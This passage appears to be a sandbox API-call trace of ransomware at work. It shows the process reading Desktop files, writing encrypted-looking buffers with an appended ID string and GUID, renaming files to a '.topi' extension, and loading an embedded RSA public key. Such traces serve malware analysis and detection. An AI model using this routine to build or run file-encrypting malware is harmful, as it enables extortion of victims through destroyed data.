Uuid=0x9ccfa48) returned 0x0 [0094.650] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.650] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.650] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.650] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.650] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.650] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xaa0) returned 0x3189d50 [0094.650] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.650] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.650] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0094.650] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.650] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0094.650] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0094.650] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3d60 [0094.650] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9108 [0094.650] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3da8 [0094.650] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9120 [0094.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9150 [0094.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9168 [0094.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0094.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0094.651] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0094.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0094.651] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9150 | out: hHeap=0x680000) returned 1 [0094.651] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9168 | out: hHeap=0x680000) returned 1 [0094.651] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.651] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0094.651] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0094.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9168 [0094.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0094.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9150 [0094.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0094.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0094.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0094.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0094.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0094.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.651] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.651] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9168 | out: hHeap=0x680000) returned 1 [0094.651] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.651] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9150 | out: hHeap=0x680000) returned 1 [0094.651] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.651] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.651] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.651] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.651] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0094.651] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.651] GetCurrentThreadId () returned 0x8c4 [0094.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0094.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x6e1ee0 [0094.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0094.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0094.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0094.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0094.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.652] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.652] GetCurrentThreadId () returned 0x8c4 [0094.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.652] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0094.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.652] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.652] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.652] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0094.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0094.652] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0094.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0094.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.652] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0094.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0094.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0094.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0094.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9150 [0094.652] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0094.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0094.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0094.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0094.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9168 [0094.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0094.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0094.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0094.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9138 [0094.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0094.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9180 [0094.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d89a0 [0094.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0094.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0094.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0094.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9150 | out: hHeap=0x680000) returned 1 [0094.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9150 [0094.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0094.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0094.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0094.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0094.654] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0094.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.654] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0094.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9150 | out: hHeap=0x680000) returned 1 [0094.654] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0094.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0094.654] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0094.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0094.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0094.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0094.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0094.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0094.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0094.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9180 | out: hHeap=0x680000) returned 1 [0094.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9168 | out: hHeap=0x680000) returned 1 [0094.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9138 | out: hHeap=0x680000) returned 1 [0094.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0094.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0094.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0094.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9120 | out: hHeap=0x680000) returned 1 [0094.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3da8 | out: hHeap=0x680000) returned 1 [0094.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0094.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0094.655] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0094.655] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.655] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.655] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0094.655] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0094.655] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.655] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0094.655] WriteFile (in: hFile=0x6a8, lpBuffer=0x3189d50*, nNumberOfBytesToWrite=0xa97, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x3189d50*, lpNumberOfBytesWritten=0x9ccfb14*=0xa97, lpOverlapped=0x0) returned 1 [0094.655] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3189d50 | out: hHeap=0x680000) returned 1 [0094.655] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xa9c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.655] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0094.655] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0094.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0094.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0094.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0094.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0094.655] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.655] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0094.655] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0094.655] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0094.655] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0094.655] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0094.655] CloseHandle (hObject=0x6a8) returned 1 [0094.664] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0094.664] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x890) returned 0x31cf750 [0094.664] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0094.664] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ThK4acWZ27MnszTc2.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\thk4acwz27mnsztc2.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ThK4acWZ27MnszTc2.pptx.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\thk4acwz27mnsztc2.pptx.topi")) returned 1 [0094.665] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.665] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.665] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0094.666] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b271800, ftCreationTime.dwHighDateTime=0x1d5be47, ftLastAccessTime.dwLowDateTime=0x40c3a880, ftLastAccessTime.dwHighDateTime=0x1d5c342, ftLastWriteTime.dwLowDateTime=0x40c3a880, ftLastWriteTime.dwHighDateTime=0x1d5c342, nFileSizeHigh=0x0, nFileSizeLow=0x1239c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="U1_x0Mr1zKGTIkq.m4a", cAlternateFileName="U1_X0M~1.M4A")) returned 1 [0094.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0094.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0094.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.666] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\U1_x0Mr1zKGTIkq.m4a") returned=".m4a" [0094.666] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\U1_x0Mr1zKGTIkq.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\u1_x0mr1zkgtikq.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.667] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=74652) returned 1 [0094.667] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.669] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x12376, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.669] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.670] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.670] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x1239c, lpOverlapped=0x0) returned 1 [0094.671] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.671] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0094.671] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.671] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.671] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: 